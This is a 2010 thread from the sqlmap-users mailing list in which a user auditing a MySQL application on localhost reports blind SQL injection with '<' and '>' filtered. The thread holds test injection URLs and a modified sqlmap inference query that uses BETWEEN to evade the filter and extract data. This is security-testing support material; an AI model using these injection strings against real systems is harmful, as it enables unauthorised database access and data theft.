Re: [sqlmap-users] blind sql injection problem
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2010-02-23 11:14:28
|
Hi. We'll take into the consideration implementation of the program option which could do this automatically - in case of inference tests usage of between program structure instead of standard lesser/greater - or maybe use it as a primary concept. Kind regards. On Tue, Feb 23, 2010 at 10:59 AM, velky brat <vel...@gm...> wrote: > Ok, I have resolved the problem. Just brief info for other users: > If characters like '<' or '>' are filtered, it is possible to modify query > like this > > > <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/> > > vb > > > On Sat, Feb 20, 2010 at 6:38 PM, velky brat <vel...@gm...> wrote: > >> Hello, >> I have found blind SQL injection in the GET parameter of audited MySQL >> application (also sqlmap is able to identify the injection), but it is not >> possible to dump any data (like --current-user or --current-db). Only >> option, which is working is --fingerprint (gives correct result of mySQL 5 >> version), all other options gave the same result as "None". >> Because it looked strange to me, I made some basic tests manually with >> following results: >> >> >> http://localhost/index.php?id=9 AND 1 = 1 ---> TRUE (should be TRUE) >> http://localhost/index.php?id=9 AND 1 = 0 ---> FALSE (should be FALSE) >> >> http://localhost/index.php?id=9 AND 6 > 5 ---> FALSE (should be TRUE) >> http://localhost/index.php?id=9 AND 6 < 5 ---> FALSE (should be FALSE) >> >> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 5 ---> FALSE >> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 10 ---> TRUE >> >> As you can see from these results, it looks that characters "<" and ">" >> are filtered within application. >> >> However, injection is still working. I suppose, that sqlmap uses these >> characters ("<",">") really often during dumping of data from database. >> So I have changed the following line in mysql section of queries.xml file: >> >> original line: >> <inference query="AND ORD(MID((%s), %d, 1)) > %d"/> >> >> updated line: >> <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/> >> >> Unfortunatelly, the result was same (None). What else should be modified? >> >> Is it be possible to use BETWEEN statement instead of ">" in current >> version of sqlmap? >> Is it already supported somehow in sqlmap or would it appear in future >> versions? >> >> Thank you in advance >> >> vb >> >> > > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |